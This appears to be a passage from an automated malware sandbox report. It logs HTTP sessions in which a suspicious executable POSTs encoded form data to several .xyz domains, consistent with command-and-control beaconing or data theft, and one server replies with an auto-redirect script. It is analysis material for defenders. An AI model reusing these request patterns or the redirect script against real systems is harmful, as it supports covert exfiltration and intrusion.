                                    Data Raw: 62 42 3d 46 53 77 6f 4f 6d 71 72 38 59 6f 46 65 30 49 43 53 37 66 47 44 38 4a 4d 54 50 30 4e 67 30 39 34 4e 54 52 4c 46 56 47 2b 76 53 46 36 43 4d 32 74 58 48 6f 63 52 64 75 6c 75 64 37 6f 4a 50 47 68 74 71 70 74 62 78 4a 36 46 6f 38 76 6e 37 35 54 59 45 4c 6f 53 48 48 2f 61 50 64 30 4f 6b 6d 57 52 65 49 47 6b 55 39 6b 73 56 77 44 35 54 72 46 62 68 62 49 7a 42 46 56 73 6d 57 78 41 78 55 39 58 6b 68 71 51 69 6b 38 37 4f 61 34 54 61 76 53 2f 66 52 72 2b 34 6c 46 33 31 69 35 79 70 54 42 4a 67 32 67 31 44 74 6e 4f 39 4c 68 33 6d 54 4e 79 52 4a 38 78 34 76 4b 54 55 59 79 72 33 36 49 38 72 79 36 68 6c 73 61 45 2b 39 44 39 6f 52 5a 50 6c 4a 4c 53 32 79 61 30 6d 73 52 4b 48 77 59 4a 51 3d 3d
                                    Data Ascii: bB=FSwoOmqr8YoFe0ICS7fGD8JMTP0Ng094NTRLFVG+vSF6CM2tXHocRdulud7oJPGhtqptbxJ6Fo8vn75TYELoSHH/aPd0OkmWReIGkU9ksVwD5TrFbhbIzBFVsmWxAxU9XkhqQik87Oa4TavS/fRr+4lF31i5ypTBJg2g1DtnO9Lh3mTNyRJ8x4vKTUYyr36I8ry6hlsaE+9D9oRZPlJLS2ya0msRKHwYJQ==


                                    Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                    19    192.168.2.6    49742    188.114.96.3    80    6784    C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp    Bytes transferred    Direction    Data
                                    Jul 11, 2024 15:07:05.394306898 CEST    1884    OUT    POST /srh8/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.globaltrend.xyz
                                    Content-Length: 1243
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.globaltrend.xyz
                                    Referer: http://www.globaltrend.xyz/srh8/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 46 53 77 6f 4f 6d 71 72 38 59 6f 46 65 30 49 43 53 37 66 47 44 38 4a 4d 54 50 30 4e 67 30 39 34 4e 54 52 4c 46 56 47 2b 76 53 4e 36 42 2b 4f 74 52 67 30 63 53 64 75 6c 31 64 37 72 4a 50 48 78 74 71 52 70 62 78 31 45 46 75 34 76 6e 5a 78 54 4a 51 58 6f 59 48 48 2f 47 2f 64 78 52 55 6e 65 52 65 59 61 6b 55 4e 6b 73 56 77 44 35 53 37 46 53 51 62 49 31 42 46 57 38 57 57 39 52 68 55 5a 58 67 30 58 51 69 78 42 34 2b 36 34 51 36 2f 53 39 4e 70 72 39 59 6c 44 32 46 69 68 79 70 58 43 4a 67 71 61 31 43 4a 42 4f 36 37 68 33 52 65 43 6f 7a 39 39 72 5a 66 5a 4b 6a 38 58 6f 79 62 36 34 6f 36 77 70 6a 63 75 48 38 35 30 36 4d 4a 31 4d 33 30 51 63 6c 6d 59 37 6d 52 6d 44 57 74 6e 4b 4a 4c 59 6d 54 46 63 41 67 77 4b 33 2b 45 51 66 46 44 46 38 44 46 76 64 66 42 7a 52 75 65 48 4e 76 6b 71 6e 4e 5a 43 7a 33 4a 4e 61 6c 2f 4f 4c 71 70 53 4b 45 52 59 43 63 6e 74 43 67 61 69 49 43 70 53 65 4d 36 46 4a 72 47 64 68 2f 30 62 52 4a 44 71 73 63 4e 4b 44 36 32 4f 47 57 37 31 2b 33 73 68 41 2b 6a 72 53 52 6d 32 4b 53 56 [TRUNCATED]
                                    Data Ascii: bB=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 [TRUNCATED]
                                    Jul 11, 2024 15:07:06.076211929 CEST    653    IN    HTTP/1.1 301 Moved Permanently
                                    Date: Thu, 11 Jul 2024 13:07:06 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Location: http://www.globaltrend.xyz
                                    X-Powered-By: PHP/7.4.6
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U9KKbeknPedlkAJZl2vNMDYuSBGYfNcqyehqlexSdUBzYblC9psb1Yb1oOzUj9y9c6I65tvY0DwnBZL0x3OPutWMuBk1Gmj4kLknxd1Va5oqY4xNZZI2HPKrboZDsDpVunlssPzy"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8a1903b91c2218b4-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                    20    192.168.2.6    49743    188.114.96.3    80    6784    C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp    Bytes transferred    Direction    Data
                                    Jul 11, 2024 15:07:07.976079941 CEST    582    OUT    GET /srh8/?bB=IQYINTaWkaojOw8AeeCEPfEIeYkq+BJ0MxZ2KDKAvD89Td2DcEp1Lez+9d6wDeiGuMtHeyxXV+kcq5RzRjH8Xk/GO/xLSHXoOvEtt1Rw61dZpGC5bSCzmgdK2DCxRFg+STwXV1g=&GX=iP9xCL HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Host: www.globaltrend.xyz
                                    Connection: close
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Jul 11, 2024 15:07:09.809554100 CEST    659    IN    HTTP/1.1 301 Moved Permanently
                                    Date: Thu, 11 Jul 2024 13:07:09 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Location: http://www.globaltrend.xyz
                                    X-Powered-By: PHP/7.4.6
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dba%2BW30romTG2H04JX%2FHk8zZN%2BVzofZ5YC50IqsbqoWcfRTvMTk1HYHs8mArO6bd2WYuLXoMzNugpX68D8abXN5DqkEwlkDuTXGuRSRHnRMewXUHwNbAOQ1ZpVpvCgRn7aL6JKhD"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8a1903c989080f71-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                    21    192.168.2.6    49745    188.114.97.3    80    6784    C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp    Bytes transferred    Direction    Data
                                    Jul 11, 2024 15:07:14.913315058 CEST    832    OUT    POST /y7ar/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.ffi07s.xyz
                                    Content-Length: 207
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.ffi07s.xyz
                                    Referer: http://www.ffi07s.xyz/y7ar/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 42 70 6a 4d 31 37 35 33 64 39 55 34 33 61 45 4b 6d 42 51 30 5a 41 47 4a 63 31 75 6e 53 65 57 77 6b 38 69 68 37 34 33 47 71 71 35 68 71 75 39 58 49 69 42 74 6c 49 69 64 49 5a 4b 43 63 54 68 51 50 4a 62 70 38 6f 77 67 6f 6a 41 53 48 50 42 43 42 59 65 65 6e 73 4d 70 56 63 65 4d 32 58 5a 6f 36 53 50 62 46 50 38 50 33 4a 42 76 66 39 76 67 63 66 73 4c 59 7a 6a 7a 7a 50 53 74 79 2f 4e 39 67 75 30 66 74 34 7a 4e 2b 46 33 6e 71 6f 4a 4a 2b 30 56 39 6f 69 67 47 6e 6e 4c 33 4f 78 70 36 72 37 48 79 69 36 37 39 74 48 53 4c 4f 72 63 73 5a 67 68 76 57 31 49 68 58 72 55 41 55 35 51 73 4f 52 74 33 2f 42 58 69 42 4d 6f 66
                                    Data Ascii: bB=BpjM1753d9U43aEKmBQ0ZAGJc1unSeWwk8ih743Gqq5hqu9XIiBtlIidIZKCcThQPJbp8owgojASHPBCBYeensMpVceM2XZo6SPbFP8P3JBvf9vgcfsLYzjzzPSty/N9gu0ft4zN+F3nqoJJ+0V9oigGnnL3Oxp6r7Hyi679tHSLOrcsZghvW1IhXrUAU5QsORt3/BXiBMof
                                    Jul 11, 2024 15:07:15.810538054 CEST    894    IN    HTTP/1.1 404 Not Found
                                    Date: Thu, 11 Jul 2024 13:07:15 GMT
                                    Content-Type: text/html; charset=us-ascii
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TIuATv8dZouRSE7GG6Hoo2F8GW85N3HReupfIGaKyFiYyX4zZxwl%2BMRUPUPlfGgT%2FU4CTYGWEQm95nYCkWueEFEt2DO%2Bupx%2FLRwU1a2UTJw9jrrNII%2BzowhuBajXopOj7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8a1903f4a91e43f7-EWR
                                    Content-Encoding: gzip
                                    alt-svc: h3=":443"; ma=86400
                                    Data Raw: 66 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f cb 6e 83 30 10 45 f7 48 fc c3 d4 7b 98 34 61 d5 1a 4b 09 b8 02 89 3c 5a 39 ad b2 8c c0 ad 91 5a 4c ed 41 b4 7f 5f 01 5d 64 79 e7 6a ce d1 e5 77 f9 31 53 97 93 84 42 ed 2b 38 9d 77 55 99 01 8b 10 df 36 19 62 ae f2 a5 48 e2 d5 3d a2 3c 30 66 88 fa 07 c4 71 1c e3 71 13 5b f7 81 ea 05 0d 7d 7d 26 e8 c9 b5 35 c5 0d 35 4c 84 01 9f 1e 05 2f e4 36 17 5c 95 aa 92 e2 60 09 9e ec d0 35 1c 97 43 18 f0 bd 54 5b 28 94 3a 45 f2 f9 5c be a6 2c b3 1d e9 8e 22 f5 db 6b 06 ff 29 65 a4 7f 68 f6 3c 42 6d ae ce 6b 4a 07 1f 5d 7d dd b6 4c 70 9c 35 61 c0 77 c7 fc 22 b8 59 df ba cc 7a 6a 8c 13 bc 17 93 09 a4 73 d6 41 b2 4a 62 50 46 83 d3 df 83 f6 a4 1b 70 da db c1 d5 1a 5a 0f 9d 25 78 9f 00 31 c7 7e 02 e0 c2 c6 79 d7 1f 00 00 00 ff ff 0d 0a 63 0d 0a e3 e5 02 00 c8 32 24 ab 3b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                    Data Ascii: fcLn0EH{4aK<Z9ZLA_]dyjw1SB+8wU6bH=<0fqq[}}&55L/6\`5CT[(:E\,"k)eh<BmkJ]}Lp5aw"YzjsAJbPFpZ%x1~yc2$;0


                                    Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                    22    192.168.2.6    49746    188.114.97.3    80    6784    C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp    Bytes transferred    Direction    Data
                                    Jul 11, 2024 15:07:17.488663912 CEST    856    OUT    POST /y7ar/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.ffi07s.xyz
                                    Content-Length: 231
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.ffi07s.xyz
                                    Referer: http://www.ffi07s.xyz/y7ar/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 42 70 6a 4d 31 37 35 33 64 39 55 34 32 2b 34 4b 72 41 51 30 4d 51 47 4b 58 56 75 6e 59 2b 57 30 6b 38 75 68 37 35 7a 57 71 5a 64 68 71 50 74 58 4a 6e 74 74 67 49 69 64 44 35 4b 48 59 54 68 58 50 4a 47 55 38 70 38 67 6f 6a 55 53 48 4c 4a 43 42 76 43 52 6b 63 4d 72 63 38 65 30 79 58 5a 6f 36 53 50 62 46 50 42 6b 33 4a 4a 76 66 4e 2f 67 64 37 34 4b 47 6a 6a 79 30 50 53 74 34 66 4d 32 67 75 31 79 74 38 7a 6e 2b 48 50 6e 71 70 35 4a 2f 6d 39 2b 6d 69 67 63 36 33 4b 47 65 68 67 57 71 4c 65 54 69 4a 65 51 78 58 43 6f 43 39 64 32 46 54 68 4d 45 6c 6f 6a 58 70 4d 79 55 5a 51 47 4d 52 56 33 74 57 62 46 4f 34 4e 38 36 77 45 2f 38 55 63 79 57 75 4b 46 39 46 31 4e 46 79 73 4e 5a 41 3d 3d
                                    Data Ascii: bB=BpjM1753d9U42+4KrAQ0MQGKXVunY+W0k8uh75zWqZdhqPtXJnttgIidD5KHYThXPJGU8p8gojUSHLJCBvCRkcMrc8e0yXZo6SPbFPBk3JJvfN/gd74KGjjy0PSt4fM2gu1yt8zn+HPnqp5J/m9+migc63KGehgWqLeTiJeQxXCoC9d2FThMElojXpMyUZQGMRV3tWbFO4N86wE/8UcyWuKF9F1NFysNZA==
                                    Jul 11, 2024 15:07:18.354121923 CEST    888    IN    HTTP/1.1 404 Not Found
                                    Date: Thu, 11 Jul 2024 13:07:18 GMT
                                    Content-Type: text/html; charset=us-ascii
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FKngYmsFnyWPrQW5HvSXTo%2B3EsE0VN3HFxM261%2BqumjblzHNrCY7DxL325PBFvlvxKC5Iigd5ZI9ujB99Efw7b28M0ejJ8UIOUdAm734xPoGSazRIla2c6JKmXNyuM%2F1jw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8a190404a89719cb-EWR
                                    Content-Encoding: gzip
                                    alt-svc: h3=":443"; ma=86400
                                    Data Raw: 31 30 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f cb 6e 83 30 10 45 f7 48 fc c3 d4 7b 98 34 61 d5 1a 4b 09 b8 02 89 3c 5a 39 ad b2 8c c0 ad 91 5a 4c ed 41 b4 7f 5f 01 5d 64 79 e7 6a ce d1 e5 77 f9 31 53 97 93 84 42 ed 2b 38 9d 77 55 99 01 8b 10 df 36 19 62 ae f2 a5 48 e2 d5 3d a2 3c 30 66 88 fa 07 c4 71 1c e3 71 13 5b f7 81 ea 05 0d 7d 7d 26 e8 c9 b5 35 c5 0d 35 4c 84 01 9f 1e 05 2f e4 36 17 5c 95 aa 92 e2 60 09 9e ec d0 35 1c 97 43 18 f0 bd 54 5b 28 94 3a 45 f2 f9 5c be a6 2c b3 1d e9 8e 22 f5 db 6b 06 ff 29 65 a4 7f 68 f6 3c 42 6d ae ce 6b 4a 07 1f 5d 7d dd b6 4c 70 9c 35 61 c0 77 c7 fc 22 b8 59 df ba cc 7a 6a 8c 13 bc 17 93 09 a4 73 d6 41 b2 4a 62 50 46 83 d3 df 83 f6 a4 1b 70 da db c1 d5 1a 5a 0f 9d 25 78 9f 00 31 c7 7e 02 e0 c2 c6 79 d7 1f 00 00 00 ff ff e3 e5 02 00 c8 32 24 ab 3b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                    Data Ascii: 108Ln0EH{4aK<Z9ZLA_]dyjw1SB+8wU6bH=<0fqq[}}&55L/6\`5CT[(:E\,"k)eh<BmkJ]}Lp5aw"YzjsAJbPFpZ%x1~y2$;0


                                    Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                    23    192.168.2.6    49747    188.114.97.3    80    6784    C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp    Bytes transferred    Direction    Data
                                    Jul 11, 2024 15:07:20.067791939 CEST    1869    OUT    POST /y7ar/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.ffi07s.xyz
                                    Content-Length: 1243
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.ffi07s.xyz
                                    Referer: http://www.ffi07s.xyz/y7ar/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 42 70 6a 4d 31 37 35 33 64 39 55 34 32 2b 34 4b 72 41 51 30 4d 51 47 4b 58 56 75 6e 59 2b 57 30 6b 38 75 68 37 35 7a 57 71 5a 56 68 71 34 74 58 49 41 5a 74 6e 49 69 64 41 35 4b 47 59 54 68 47 50 4a 4f 59 38 70 41 65 6f 67 73 53 42 5a 52 43 49 39 71 52 2f 73 4d 72 65 38 65 50 32 58 5a 48 36 53 66 66 46 4c 68 6b 33 4a 4a 76 66 4c 37 67 55 50 73 4b 45 6a 6a 7a 7a 50 53 66 79 2f 4d 65 67 71 59 48 74 38 6e 64 2f 7a 7a 6e 6b 70 70 4a 35 54 4a 2b 35 79 67 43 37 33 4b 65 65 68 38 4a 71 4c 79 78 69 49 37 4c 78 52 2b 6f 41 37 51 49 52 48 52 61 46 6e 59 76 48 70 63 47 59 39 41 6b 47 67 78 34 75 56 7a 33 42 61 45 58 2b 6e 34 72 70 32 70 68 57 75 79 32 78 53 68 53 4f 67 70 36 4b 6a 69 46 32 57 2f 6c 39 6b 75 35 61 38 39 79 7a 77 45 32 6b 2f 75 42 71 6e 6f 41 71 61 61 52 55 44 75 31 45 35 6b 73 71 55 30 43 79 45 5a 6c 31 33 68 69 62 75 53 6f 4e 44 64 4e 55 63 4a 32 58 34 6f 49 41 52 66 75 54 70 4a 49 76 50 54 6f 54 4b 43 55 57 6f 74 65 2f 49 6e 51 7a 56 74 6e 30 71 70 79 68 72 51 56 32 2f 4d 67 55 30 32 [TRUNCATED]
                                    Data Ascii: bB=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 [TRUNCATED]
                                    Jul 11, 2024 15:07:20.942728996 CEST    868    IN    HTTP/1.1 404 Not Found
                                    Date: Thu, 11 Jul 2024 13:07:20 GMT
                                    Content-Type: text/html; charset=us-ascii
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bfywAuq6TP66AJM00t%2BpvMGUqNzHrVvhWLY18f9pnMnKpCekVM0llttJsHu2cvLalRWJE3Q6GiYKE6UUcWaAI%2BjtY1pRZ3LsEjjILS86k3QNuJ5TMjI0ci%2B4VaPuLVLLuQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8a190414ca9b433a-EWR
                                    Content-Encoding: gzip
                                    alt-svc: h3=":443"; ma=86400
                                    Jul 11, 2024 15:07:20.943025112 CEST | 22 | IN | Data Ascii: c2$;0


                                    Session ID: 24 | Source IP: 192.168.2.6 | Source Port: 49748 | Destination IP: 188.114.97.3 | Destination Port: 80 | PID: 6784 | Process: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jul 11, 2024 15:07:22.659610987 CEST | 577 | OUT | GET /y7ar/?GX=iP9xCL&bB=MrLs2OZQS9tqlK4Srgs+GAHAbHC9a9uyqM6nyvTx+aYY18R7NjkvoreXBqubaQ9RYarkm74io0l/Sb1qLPuR4+YifOOZ+EhKqCv3QpVMh7JIatK9VOcTaRm42vaE2swrp5p8moc= HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Host: www.ffi07s.xyz
                                    Connection: close
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Jul 11, 2024 15:07:23.577620029 CEST | 920 | IN | HTTP/1.1 404 Not Found
                                    Date: Thu, 11 Jul 2024 13:07:23 GMT
                                    Content-Type: text/html; charset=us-ascii
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9mhj2QU2yuNbB3RPyEqvFPzhn1InLSTIV3veJucl6zqBUUtZ6FuVfPOZ2BcVJuWJSKFyCkqnL9TNeVTP5ptjN%2FMJl%2BYSFr8HUjByNOscGOEaT6tZ0iD%2F5BHDSqisKnhd%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8a1904252e24729e-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    Data Ascii: 139<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>20


                                    Session ID: 25 | Source IP: 192.168.2.6 | Source Port: 49749 | Destination IP: 154.222.238.52 | Destination Port: 80 | PID: 6784 | Process: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jul 11, 2024 15:07:30.927772999 CEST | 826 | OUT | POST /y0md/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.j51a.xyz
                                    Content-Length: 207
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.j51a.xyz
                                    Referer: http://www.j51a.xyz/y0md/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Ascii: bB=ojwlwz5hjBb//olh6Vg4rWyT26XmHns6Zm1UNg4MipAUObci0DZh86zE1e7RTjyoqWLlmX7TJTWmkZ17jM4ur9V/uFGWFO0BxFT82ssB0+bZ+36V7mPXcrNk302tiLPJQlOlayFdJBZwqkhet2o3wcYaXGz3F6LNiHu7iGXqoWL+ei2nzvXX6Xn3UaDxWBGy5OifGsI1eifO
                                    Jul 11, 2024 15:07:31.710470915 CEST | 557 | IN | HTTP/1.0 200 OK
                                    Connection: close
                                    Cache-Control: max-age=259200
                                    Content-Type: text/html;charset=utf-8
                                    Content-Length: 428
                                    Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                    Session ID: 26 | Source IP: 192.168.2.6 | Source Port: 49750 | Destination IP: 154.222.238.52 | Destination Port: 80 | PID: 6784 | Process: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jul 11, 2024 15:07:33.501312971 CEST | 850 | OUT | POST /y0md/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.j51a.xyz
                                    Content-Length: 231
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.j51a.xyz
                                    Referer: http://www.j51a.xyz/y0md/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Ascii: bB=ojwlwz5hjBb/9L9h8G44nmyQ4aXmOHs+ZmJUNkpBjb0UO+Yi7iZh76zEtO7ULDy3qWOYmXHTJTqmkYF7j954ttV921GYLu0BxFT82sIn0+TZ+nKV7EnISLNjgE2tmLPNQlOXazJ7JCxwqhletHph5cYYamzmC6a8mEu+gQPYzGueS039vcX0oHH1UYbDWhGY7OafU7ESRW6tytuFvcYZfNcnjQ+4zxfx6A==
                                    Jul 11, 2024 15:07:34.281130075 CEST | 557 | IN | HTTP/1.0 200 OK
                                    Connection: close
                                    Cache-Control: max-age=259200
                                    Content-Type: text/html;charset=utf-8
                                    Content-Length: 428
                                    Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                    Session ID: 27 | Source IP: 192.168.2.6 | Source Port: 49751 | Destination IP: 154.222.238.52 | Destination Port: 80 | PID: 6784 | Process: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jul 11, 2024 15:07:36.295028925 CEST | 1863 | OUT | POST /y0md/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.j51a.xyz
                                    Content-Length: 1243
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.j51a.xyz
                                    Referer: http://www.j51a.xyz/y0md/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
